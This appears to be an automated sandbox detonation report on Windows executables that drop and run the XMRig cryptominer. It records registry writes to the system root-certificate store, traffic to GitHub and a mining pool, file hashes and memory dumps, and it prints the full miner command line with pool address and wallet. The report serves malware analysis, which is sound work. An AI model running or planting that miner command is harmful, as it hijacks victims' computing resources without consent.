Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2476-14-0x0000014CFE3C0000-0x0000014CFE3E0000-memory.dmp

memory/2476-15-0x0000014CFFBD0000-0x0000014CFFBF0000-memory.dmp

memory/2476-16-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-19-0x0000014CFFC10000-0x0000014CFFC30000-memory.dmp

memory/2476-18-0x0000014CFFBF0000-0x0000014CFFC10000-memory.dmp

memory/2476-17-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-20-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-21-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-22-0x0000014CFFBF0000-0x0000014CFFC10000-memory.dmp

memory/2476-23-0x0000014CFFC10000-0x0000014CFFC30000-memory.dmp

memory/2476-24-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-25-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-26-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-27-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-28-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-29-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-30-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-31-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-32-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-33-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-34-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-35-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-36-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-37-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-38-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-39-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-40-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-41-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-42-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-43-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-44-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-45-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-46-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-47-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-48-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-49-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-50-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-51-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-52-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-53-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-54-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-55-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-56-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-57-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-58-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-59-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-60-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-61-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-62-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-63-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-64-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-65-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-66-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-67-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-68-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-69-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-70-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-71-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-72-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-73-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-74-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-75-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-76-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-77-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-78-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-79-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-80-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-81-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

memory/2476-82-0x00007FF7C9260000-0x00007FF7C9D63000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240508-en

Max time kernel

1667s

Max time network

1686s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1801s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3728,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4988,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4924 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4944-14-0x000001C83B120000-0x000001C83B140000-memory.dmp

memory/4944-15-0x000001C83C910000-0x000001C83C930000-memory.dmp

memory/4944-16-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-18-0x000001C83C930000-0x000001C83C950000-memory.dmp

memory/4944-17-0x000001C83C950000-0x000001C83C970000-memory.dmp

memory/4944-19-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-20-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-23-0x000001C83C930000-0x000001C83C950000-memory.dmp

memory/4944-22-0x000001C83C950000-0x000001C83C970000-memory.dmp

memory/4944-21-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-24-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-25-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-26-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-27-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-28-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-29-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-30-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-31-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

